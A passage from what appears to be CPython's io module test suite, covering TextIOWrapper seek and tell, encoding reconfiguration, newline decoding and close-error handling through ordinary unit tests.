# Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(os_helper.TESTFN, 'wb') f.write(data) f.close() f = self.open(os_helper.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(os_helper.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. 
finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. 
def test_read_by_chunk(self): # make sure "\r\n" straddles 128 char boundary. txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB")) reads = "" while True: c = txt.read(128) if not c: break reads += c self.assertEqual(reads, "A"*127+"\nB") def test_writelines(self): l = ['ab', 'cd', 'ef'] buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_userlist(self): l = UserList(['ab', 'cd', 'ef']) buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_error(self): txt = self.TextIOWrapper(self.BytesIO()) self.assertRaises(TypeError, txt.writelines, [1, 2, 3]) self.assertRaises(TypeError, txt.writelines, None) self.assertRaises(TypeError, txt.writelines, b'abc') def test_issue1395_1(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") # read one char at a time reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_2(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = "" while True: c = txt.read(4) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_3(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read(4) reads += txt.readline() reads += txt.readline() reads += txt.readline() self.assertEqual(reads, self.normalized) def test_issue1395_4(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read() self.assertEqual(reads, self.normalized) def test_issue1395_5(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) pos = txt.tell() txt.seek(0) txt.seek(pos) self.assertEqual(txt.read(4), 
"BBB\n") def test_issue2282(self): buffer = self.BytesIO(self.testdata) txt = self.TextIOWrapper(buffer, encoding="ascii") self.assertEqual(buffer.seekable(), txt.seekable()) def test_append_bom(self): # The BOM is not written again when appending to a non-empty file filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaa'.encode(charset)) with self.open(filename, 'a', encoding=charset) as f: f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_seek_bom(self): # Same test, but when seeking manually filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'r+', encoding=charset) as f: f.seek(pos) f.write('zzz') f.seek(0) f.write('bbb') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'bbbzzz'.encode(charset)) def test_seek_append_bom(self): # Same test, but first seek to the start and then to the end filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') with self.open(filename, 'a', encoding=charset) as f: f.seek(0) f.seek(0, self.SEEK_END) f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_errors_property(self): with self.open(os_helper.TESTFN, "w") as f: self.assertEqual(f.errors, "strict") with self.open(os_helper.TESTFN, "w", errors="replace") as f: self.assertEqual(f.errors, "replace") @support.no_tracing def test_threads_write(self): # Issue6750: concurrent writes could duplicate data event = threading.Event() with self.open(os_helper.TESTFN, "w", buffering=1) as f: def run(n): text = "Thread%03d\n" % n event.wait() f.write(text) 
threads = [threading.Thread(target=run, args=(x,)) for x in range(20)] with threading_helper.start_threads(threads, event.set): time.sleep(0.02) with self.open(os_helper.TESTFN) as f: content = f.read() for n in range(20): self.assertEqual(content.count("Thread%03d\n" % n), 1) def test_flush_error_on_close(self): # Test that text file is closed despite failed flush # and that flush() is called before file closed. txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") closed = [] def bad_flush(): closed[:] = [txt.closed, txt.buffer.closed] raise OSError() txt.flush = bad_flush self.assertRaises(OSError, txt.close) # exception not swallowed self.assertTrue(txt.closed) self.assertTrue(txt.buffer.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) txt.flush = lambda: None # break reference loop def test_close_error_on_close(self): buffer = self.BytesIO(self.testdata) def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed txt.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 buffer = self.BytesIO(self.testdata) def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed txt.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) 
self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_multi_close(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt.close() txt.close() txt.close() self.assertRaises(ValueError, txt.flush) def test_unseekable(self): txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata)) self.assertRaises(self.UnsupportedOperation, txt.tell) self.assertRaises(self.UnsupportedOperation, txt.seek, 0) def test_readonly_attributes(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") buf = self.BytesIO(self.testdata) with self.assertRaises(AttributeError): txt.buffer = buf def test_rawio(self): # Issue #12591: TextIOWrapper must work with raw I/O objects, so # that subprocess.Popen() can have the required unbuffered # semantics with universal_newlines=True. raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') # Reads self.assertEqual(txt.read(4), 'abcd') self.assertEqual(txt.readline(), 'efghi\n') self.assertEqual(list(txt), ['jkl\n', 'opq\n']) def test_rawio_write_through(self): # Issue #12591: with write_through=True, writes don't need a flush raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n', write_through=True) txt.write('1') txt.write('23\n4') txt.write('5') self.assertEqual(b''.join(raw._write_stack), b'123\n45') def test_bufio_write_through(self): # Issue #21396: write_through=True doesn't force a flush() # on the underlying binary buffered object. 
flush_called, write_called = [], [] class BufferedWriter(self.BufferedWriter): def flush(self, *args, **kwargs): flush_called.append(True) return super().flush(*args, **kwargs) def write(self, *args, **kwargs): write_called.append(True) return super().write(*args, **kwargs) rawio = self.BytesIO() data = b"a" bufio = BufferedWriter(rawio, len(data)*2) textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True) # write to the buffered io but don't overflow the buffer text = data.decode('ascii') textio.write(text) # buffer.flush is not called with write_through=True self.assertFalse(flush_called) # buffer.write *is* called with write_through=True self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), b"") # no flush write_called = [] # reset textio.write(text * 10) # total content is larger than bufio buffer self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), data * 11) # all flushed def test_reconfigure_write_through(self): raw = self.MockRawIO([]) t = self.TextIOWrapper(raw, encoding='ascii', newline='\n') t.write('1') t.reconfigure(write_through=True) # implied flush self.assertEqual(t.write_through, True) self.assertEqual(b''.join(raw._write_stack), b'1') t.write('23') self.assertEqual(b''.join(raw._write_stack), b'123') t.reconfigure(write_through=False) self.assertEqual(t.write_through, False) t.write('45') t.flush() self.assertEqual(b''.join(raw._write_stack), b'12345') # Keeping default value t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, False) t.reconfigure(write_through=True) t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, True) def test_read_nonbytes(self): # Issue #17106 # Crash when underlying read() returns non-bytes t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read, 1) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.readline) t = self.TextIOWrapper(self.StringIO('a')) 
self.assertRaises(TypeError, t.read) def test_illegal_encoder(self): # Issue 31271: Calling write() while the return value of encoder's # encode() is invalid shouldn't cause an assertion failure. rot13 = codecs.lookup("rot13") with support.swap_attr(rot13, '_is_text_encoding', True): t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13") self.assertRaises(TypeError, t.write, 'bar') def test_illegal_decoder(self): # Issue #17106 # Bypass the early encoding check added in issue 20404 def _make_illegal_wrapper(): quopri = codecs.lookup("quopri") quopri._is_text_encoding = True try: t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n', encoding="quopri") finally: quopri._is_text_encoding = False return t # Crash when decoder returns non-string t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read, 1) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.readline) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read) # Issue 31243: calling read() while the return value of decoder's # getstate() is invalid should neither crash the interpreter nor # raise a SystemError. def _make_very_illegal_wrapper(getstate_ret_val): class BadDecoder: def getstate(self): return getstate_ret_val def _get_bad_decoder(dummy): return BadDecoder() quopri = codecs.lookup("quopri") with support.swap_attr(quopri, 'incrementaldecoder', _get_bad_decoder): return _make_illegal_wrapper() t = _make_very_illegal_wrapper(42) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper(()) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper((1, 2)) self.assertRaises(TypeError, t.read, 42) def _check_create_at_shutdown(self, **kwargs): # Issue #20037: creating a TextIOWrapper at shutdown # shouldn't crash the interpreter. 
iomod = self.io.__name__ code = """if 1: import codecs import {iomod} as io # Avoid looking up codecs at shutdown codecs.lookup('utf-8') class C: def __init__(self): self.buf = io.BytesIO() def __del__(self): io.TextIOWrapper(self.buf, **{kwargs}) print("ok") c = C() """.format(iomod=iomod, kwargs=kwargs) return assert_python_ok("-c", code) def test_create_at_shutdown_without_encoding(self): rc, out, err = self._check_create_at_shutdown() if err: # Can error out with a RuntimeError if the module state # isn't found. self.assertIn(self.shutdown_error, err.decode()) else: self.assertEqual("ok", out.decode().strip()) def test_create_at_shutdown_with_encoding(self): rc, out, err = self._check_create_at_shutdown(encoding='utf-8', errors='strict') self.assertFalse(err) self.assertEqual("ok", out.decode().strip()) def test_read_byteslike(self): r = MemviewBytesIO(b'Just some random string\n') t = self.TextIOWrapper(r, 'utf-8') # TextIOwrapper will not read the full string, because # we truncate it to a multiple of the native int size # so that we can construct a more complex memoryview. 
bytes_val = _to_memoryview(r.getvalue()).tobytes() self.assertEqual(t.read(200), bytes_val.decode('utf-8')) def test_issue22849(self): class F(object): def readable(self): return True def writable(self): return True def seekable(self): return True for i in range(10): try: self.TextIOWrapper(F(), encoding='utf-8') except Exception: pass F.tell = lambda x: 0 t = self.TextIOWrapper(F(), encoding='utf-8') def test_reconfigure_encoding_read(self): # latin1 -> utf8 # (latin1 can decode utf-8 encoded string) data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8') raw = self.BytesIO(data) txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') self.assertEqual(txt.readline(), 'abc\xe9\n') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(encoding='utf-8') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(newline=None) def test_reconfigure_write_fromascii(self): # ascii has a specific encodefunc in the C implementation, # but utf-8-sig has not. Make sure that we get rid of the # cached encodefunc when we switch encoders. 
        # Write ASCII first (exercising the cached ASCII encodefunc), then
        # reconfigure and verify non-ASCII output comes out UTF-8 encoded.
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('foo\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('\xe9\n')
        txt.flush()
        self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')

    def test_reconfigure_write(self):
        # latin -> utf8
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
        txt.write('abc\xe9\n')
        txt.reconfigure(encoding='utf-8')
        # Pending latin-1 output must be flushed before the encoder switches.
        self.assertEqual(raw.getvalue(), b'abc\xe9\n')
        txt.write('d\xe9f\n')
        txt.flush()
        self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')

        # ascii -> utf-8-sig: ensure that no BOM is written in the middle of
        # the file
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('abc\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('d\xe9f\n')
        txt.flush()
        self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')

    def test_reconfigure_write_non_seekable(self):
        # Make the raw stream look unseekable so the wrapper cannot inspect
        # the current position when switching encoders.
        raw = self.BytesIO()
        raw.seekable = lambda: False
        raw.seek = None
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('abc\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('d\xe9f\n')
        txt.flush()

        # If the raw stream is not seekable, there'll be a BOM
        self.assertEqual(raw.getvalue(),  b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')

    def test_reconfigure_defaults(self):
        # reconfigure(field=None) keeps the current setting for that field.
        txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
        txt.reconfigure(encoding=None)
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'replace')
        txt.write('LF\n')

        txt.reconfigure(newline='\r\n')
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'replace')

        txt.reconfigure(errors='ignore')
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'ignore')
        txt.write('CRLF\n')

        # Changing the encoding resets the error handler back to 'strict'.
        txt.reconfigure(encoding='utf-8', newline=None)
        self.assertEqual(txt.errors, 'strict')
        txt.seek(0)
        self.assertEqual(txt.read(), 'LF\nCRLF\n')

        self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')

    def test_reconfigure_newline(self):
        raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline=None) self.assertEqual(txt.readline(), 'CR\n') raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='') self.assertEqual(txt.readline(), 'CR\r') raw = self.BytesIO(b'CR\rLF\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\n') self.assertEqual(txt.readline(), 'CR\rLF\n') raw = self.BytesIO(b'LF\nCR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='\r') self.assertEqual(txt.readline(), 'LF\nCR\r') raw = self.BytesIO(b'CR\rCRLF\r\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\r\n') self.assertEqual(txt.readline(), 'CR\rCRLF\r\n') txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r') txt.reconfigure(newline=None) txt.write('linesep\n') txt.reconfigure(newline='') txt.write('LF\n') txt.reconfigure(newline='\n') txt.write('LF\n') txt.reconfigure(newline='\r') txt.write('CR\n') txt.reconfigure(newline='\r\n') txt.write('CRLF\n') expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n' self.assertEqual(txt.detach().getvalue().decode('ascii'), expected) def test_issue25862(self): # Assertion failures occurred in tell() after read() and write(). 
        # Issue 25862: tell() after a short read followed by a read-to-EOF
        # must not trip internal assertions.
        t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
        t.read(1)
        t.read()
        t.tell()

        # Same check for tell() after interleaving a read with a write.
        t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
        t.read(1)
        t.write('x')
        t.tell()


class MemviewBytesIO(io.BytesIO):
    '''A BytesIO object whose read method returns memoryviews
       rather than bytes'''

    def read1(self, len_):
        # Delegate to BytesIO, then wrap the returned bytes in a memoryview.
        return _to_memoryview(super().read1(len_))

    def read(self, len_):
        return _to_memoryview(super().read(len_))

def _to_memoryview(buf):
    '''Convert bytes-object *buf* to a non-trivial memoryview'''
    # Use an int array so the view has a multi-byte itemsize; truncate the
    # input to a multiple of itemsize so frombytes() accepts it.
    arr = array.array('i')
    idx = len(buf) - len(buf) % arr.itemsize
    arr.frombytes(buf[:idx])
    return memoryview(arr)


class CTextIOWrapperTest(TextIOWrapperTest):
    # Run the shared TextIOWrapperTest suite against the C implementation.
    io = io
    shutdown_error = "LookupError: unknown encoding: ascii"

    def test_initialization(self):
        # Invalid constructor arguments must raise and leave the wrapper
        # unusable rather than half-initialized.
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
        self.assertRaises(ValueError, t.read)

        # A wrapper allocated via __new__ but never __init__'ed must still
        # have a safe (raising) repr.
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)

    def test_garbage_collection(self):
        # C TextIOWrapper objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends in gc.garbage instead.
        with warnings_helper.check_warnings(('', ResourceWarning)):
            rawio = io.FileIO(os_helper.TESTFN, "wb")
            b = self.BufferedWriter(rawio)
            t = self.TextIOWrapper(b, encoding="ascii")
            t.write("456def")
            t.x = t  # deliberate reference cycle so only the GC can free it
            wr = weakref.ref(t)
            del t
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(os_helper.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"456def")

    def test_rwpair_cleared_before_textio(self):
        # Issue 13070: TextIOWrapper's finalization would crash when called
        # after the reference to the underlying BufferedRWPair's writer got
        # cleared by the GC.
for i in range(1000): b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t1 = self.TextIOWrapper(b1, encoding="ascii") b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t2 = self.TextIOWrapper(b2, encoding="ascii") # circular references t1.buddy = t2 t2.buddy = t1 support.gc_collect() def test_del__CHUNK_SIZE_SystemError(self): t = self.TextIOWrapper(self.BytesIO(), encoding='ascii') with self.assertRaises(AttributeError): del t._CHUNK_SIZE class PyTextIOWrapperTest(TextIOWrapperTest): io = pyio shutdown_error = "LookupError: unknown encoding: ascii" class IncrementalNewlineDecoderTest(unittest.TestCase): def check_newline_decoding_utf8(self, decoder): # UTF-8 specific tests for a newline decoder def _check_decode(b, s, **kwargs): # We exercise getstate() / setstate() as well as decode() state = decoder.getstate() self.assertEqual(decoder.decode(b, **kwargs), s) decoder.setstate(state) self.assertEqual(decoder.decode(b, **kwargs), s) _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True) decoder.reset() _check_decode(b'\n', "\n") _check_decode(b'\r', "") _check_decode(b'', "\n", final=True) _check_decode(b'\r', "\n", final=True) _check_decode(b'\r', "") _check_decode(b'a', "\na") _check_decode(b'\r\r\n', "\n\n") _check_decode(b'\r', "") _check_decode(b'\r', "\n") _check_decode(b'\na', "\na") _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n") _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\n', "\n") _check_decode(b'\xe8\xa2\x88\r', "\u8888") _check_decode(b'\n', "\n") def check_newline_decoding(self, decoder, encoding): result = [] if encoding is not None: encoder = codecs.getincrementalencoder(encoding)() def _decode_bytewise(s): # Decode one byte at a time for b in encoder.encode(s): 
result.append(decoder.decode(bytes([b]))) else: encoder = None def _decode_bytewise(s): # Decode one char at a time for c in s: result.append(decoder.decode(c)) self.assertEqual(decoder.newlines, None) _decode_bytewise("abc\n\r") self.assertEqual(decoder.newlines, '\n') _decode_bytewise("\nabc") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc") self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc") decoder.reset() input = "abc" if encoder is not None: encoder.reset() input = encoder.encode(input) self.assertEqual(decoder.decode(input), "abc") self.assertEqual(decoder.newlines, None) def test_newline_decoder(self): encodings = ( # None meaning the IncrementalNewlineDecoder takes unicode input # rather than bytes input None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) for enc in encodings: decoder = enc and codecs.getincrementaldecoder(enc)() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding(decoder, enc) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding_utf8(decoder) self.assertRaises(TypeError, decoder.setstate, 42) def test_newline_bytes(self): # Issue 5433: Excessive optimization in IncrementalNewlineDecoder def _check(dec): self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0D00"), "\u0D00") self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0A00"), "\u0A00") self.assertEqual(dec.newlines, None) dec = self.IncrementalNewlineDecoder(None, translate=False) _check(dec) dec = self.IncrementalNewlineDecoder(None, translate=True) _check(dec) def test_translate(self): # issue 35062 for translate in (-2, -1, 1, 2): decoder = codecs.getincrementaldecoder("utf-8")() 
decoder = self.IncrementalNewlineDecoder(decoder, translate) self.check_newline_decoding_utf8(decoder) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=0) self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n") class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass # XXX Tests for open() class MiscIOTest(unittest.TestCase): def tearDown(self): os_helper.unlink(os_helper.TESTFN) def test___all__(self): for name in self.io.__all__: obj = getattr(self.io, name, None) self.assertIsNotNone(obj, name) if name in ("open", "open_code"): continue elif "error" in name.lower() or name == "UnsupportedOperation": self.assertTrue(issubclass(obj, Exception), name) elif not name.startswith("SEEK_"): self.assertTrue(issubclass(obj, self.IOBase)) def test_attributes(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) self.assertEqual(f.mode, "wb") f.close() with warnings_helper.check_warnings(('', DeprecationWarning)): f = self.open(os_helper.TESTFN, "U") self.assertEqual(f.name, os_helper.TESTFN) self.assertEqual(f.buffer.name, os_helper.TESTFN) self.assertEqual(f.buffer.raw.name, os_helper.TESTFN) self.assertEqual(f.mode, "U") self.assertEqual(f.buffer.mode, "rb") self.assertEqual(f.buffer.raw.mode, "rb") f.close() f = self.open(os_helper.TESTFN, "w+") self.assertEqual(f.mode, "w+") self.assertEqual(f.buffer.mode, "rb+") # Does it really matter? self.assertEqual(f.buffer.raw.mode, "rb+") g = self.open(f.fileno(), "wb", closefd=False) self.assertEqual(g.mode, "wb") self.assertEqual(g.raw.mode, "wb") self.assertEqual(g.name, f.fileno()) self.assertEqual(g.raw.name, f.fileno()) f.close() g.close() def test_open_pipe_with_append(self): # bpo-27805: Ignore ESPIPE from lseek() in open(). r, w = os.pipe() self.addCleanup(os.close, r) f = self.open(w, 'a') self.addCleanup(f.close) # Check that the file is marked non-seekable. 
On Windows, however, lseek # somehow succeeds on pipes. if sys.platform != 'win32': self.assertFalse(f.seekable()) def test_io_after_close(self): for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "w", "buffering": 1}, {"mode": "w", "buffering": 2}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "r", "buffering": 1}, {"mode": "r", "buffering": 2}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+", "buffering": 1}, {"mode": "w+", "buffering": 2}, {"mode": "w+b", "buffering": 0}, ]: f = self.open(os_helper.TESTFN, **kwargs) f.close() self.assertRaises(ValueError, f.flush) self.assertRaises(ValueError, f.fileno) self.assertRaises(ValueError, f.isatty) self.assertRaises(ValueError, f.__iter__) if hasattr(f, "peek"): self.assertRaises(ValueError, f.peek, 1) self.assertRaises(ValueError, f.read) if hasattr(f, "read1"): self.assertRaises(ValueError, f.read1, 1024) self.assertRaises(ValueError, f.read1) if hasattr(f, "readall"): self.assertRaises(ValueError, f.readall) if hasattr(f, "readinto"): self.assertRaises(ValueError, f.readinto, bytearray(1024)) if hasattr(f, "readinto1"): self.assertRaises(ValueError, f.readinto1, bytearray(1024)) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) self.assertRaises(ValueError, f.readlines, 1) self.assertRaises(ValueError, f.seek, 0) self.assertRaises(ValueError, f.tell) self.assertRaises(ValueError, f.truncate) self.assertRaises(ValueError, f.write, b"" if "b" in kwargs['mode'] else "") self.assertRaises(ValueError, f.writelines, []) self.assertRaises(ValueError, next, f) def test_blockingioerror(self): # Various BlockingIOError issues class C(str): pass c = C("") b = self.BlockingIOError(1, c) c.b = b b.c = c wr = weakref.ref(c) del c, b support.gc_collect() self.assertIsNone(wr(), wr) def test_abcs(self): # Test the visible base classes are ABCs. 
